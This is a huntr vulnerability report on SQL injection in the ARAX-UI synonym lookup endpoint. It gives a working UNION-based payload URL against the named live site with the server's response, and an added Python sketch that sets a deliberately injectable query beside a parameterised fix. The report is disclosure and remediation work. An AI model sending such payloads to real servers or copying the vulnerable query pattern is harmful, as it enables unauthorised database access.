SQL injection vulnerability in ARAX-UI Synonym Lookup functionality

Published 2022-04-16 02:56:42 by deleterepo on www.huntr.dev (huntr report FC4EB544-EF1E-412D-9FDB-0CEB04E038FE)

EPSS: 0.002 (Low), percentile 55.9%

Description

The /rtxcomplete/nodeslike endpoint of the ARAX-UI application at https://arax.rtx.ai is vulnerable to SQL injection through the word query parameter. The value of word is incorporated into a query that the backend SQLite database executes, so a crafted payload can add attacker-chosen SQL to that query and be used to dump the database or to modify or delete its contents. The report further asserts that the same flaw can be leveraged for remote code execution and complete takeover of the hosting server; note that the proof of concept below demonstrates only a read (a UNION query returning sqlite_version()), not code execution or data modification.

Proof of Concept

Perform a GET request to:

https://arax.rtx.ai/rtxcomplete/nodeslike?word=test\" UNION SELECT sqlite_version()---&limit=15&callback=jQuery33105838363973705006_1650064361901&_=1650064362018

The server returns JSONP (the response is wrapped in the supplied callback name) in which the first element of the array carries the SQLite version string, "3.11.0", in its name field. A legitimate name lookup cannot produce this value; its presence confirms that the injected UNION SELECT sqlite_version() was executed by the database, and the trailing -- comment swallowed the remainder of the original statement:

jQuery33105838363973705006_1650064361901([{"curie": "??", "name": "3.11.0", "type": "??"}, {"curie": "??", "name": "Testa-C", "type": "??"}, {"curie": "??", "name": "testacea group", "type": "??"}, {"curie": "??", "name": "Testacella", "type": "??"}, {"curie": "??", "name": "Testacella haliotidea", "type": "??"}, {"curie": "??", "name": "Testacella maugei", "type": "??"}, {"curie": "??", "name": "Testacella scutulum", "type": "??"}, {"curie": "??", "name": "Testacella sp. NMW.Z", "type": "??"}, {"curie": "??", "name": "Testacellidae", "type": "??"}, {"curie": "??", "name": "testase 4, human", "type": "??"}, {"curie": "??", "name": "Testate", "type": "??"}, {"curie": "??", "name": "Testechiniscus", "type": "??"}, {"curie": "??", "name": "Testechiniscus spitsbergensis", "type": "??"}, {"curie": "??", "name": "tested for", "type": "??"}, {"curie": "??", "name": "Tested for HIV", "type": "??"}]);
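The following is an added example and is not code from the huntr report or from the ARAX code base. It reconstructs, hypothetically, the kind of string-built LIKE query that produces this behaviour, runs the injected payload against an in-memory SQLite table of constructed sample names, and places a parameterised version beside it. The table name nodes, the column names, the single-quote string delimiter and the LIMIT clamp are assumptions; the report's payload used a double quote, which SQLite's default double-quoted-string fallback also accepts as a string literal, so the mechanism is the same. In this reconstruction the comment also removes the trailing wildcard, so only the attacker's row comes back; the live endpoint evidently still returned prefix matches alongside it, so its query shape differs from the one assumed here.

```python
import sqlite3

# Constructed sample rows standing in for the synonym table. The names echo the
# shape of the response above; schema and table name are assumptions, not ARAX's.
SAMPLE_NAMES = ["Testa-C", "testacea group", "Testacella", "Tested for HIV",
                "Thalassemia", "%ile"]

# The injected payload, with a single-quote delimiter to match the assumed query.
PAYLOAD = "test' UNION SELECT sqlite_version()--"


def build_db():
    """Create an in-memory SQLite database holding the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE nodes (curie TEXT, name TEXT, type TEXT)")
    conn.executemany("INSERT INTO nodes VALUES (?, ?, ?)",
                     [("??", n, "??") for n in SAMPLE_NAMES])
    return conn


def nodeslike_vulnerable(conn, word, limit=15):
    """Hypothetical vulnerable handler: `word` is spliced into the SQL text.

    With PAYLOAD the statement becomes
      SELECT name FROM nodes WHERE name LIKE 'test' UNION SELECT sqlite_version()--%' ORDER BY ...
    The closing quote ends the literal early, UNION appends an attacker-chosen
    row, and the -- comment discards the wildcard, ORDER BY and LIMIT.
    """
    sql = ("SELECT name FROM nodes WHERE name LIKE '%s%%' "
           "ORDER BY name LIMIT %d" % (word, int(limit)))
    return [row[0] for row in conn.execute(sql)]


def nodeslike_safe(conn, word, limit=15):
    """Hardened handler: bind the value, escape LIKE metacharacters, clamp limit.

    Binding alone stops the injection; escaping % and _ additionally stops a
    client from turning a prefix lookup into a full-table scan with "%".
    """
    escaped = (word.replace("\\", "\\\\")
                   .replace("%", "\\%")
                   .replace("_", "\\_"))
    limit = max(1, min(int(limit), 100))   # never trust a client-supplied limit
    sql = ("SELECT name FROM nodes WHERE name LIKE ? ESCAPE '\\' "
           "ORDER BY name LIMIT ?")
    return [row[0] for row in conn.execute(sql, (escaped + "%", limit))]


def sqlite_version_string():
    """Version of the linked SQLite library; SQL sqlite_version() returns the same string."""
    return sqlite3.sqlite_version


def demo():
    """Run both handlers over the same inputs and return the results for inspection."""
    conn = build_db()
    return {
        "vulnerable": nodeslike_vulnerable(conn, PAYLOAD),
        "safe_with_payload": nodeslike_safe(conn, PAYLOAD),
        "safe_normal": nodeslike_safe(conn, "test"),
        "safe_wildcard": nodeslike_safe(conn, "%"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

In the vulnerable handler the payload yields a single row holding the library version, exactly the tell seen in the report's response; in the hardened handler the same payload is just a string that no name begins with, so the result is empty, and a bare "%" matches only the one constructed name that literally starts with a percent sign rather than the whole table.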

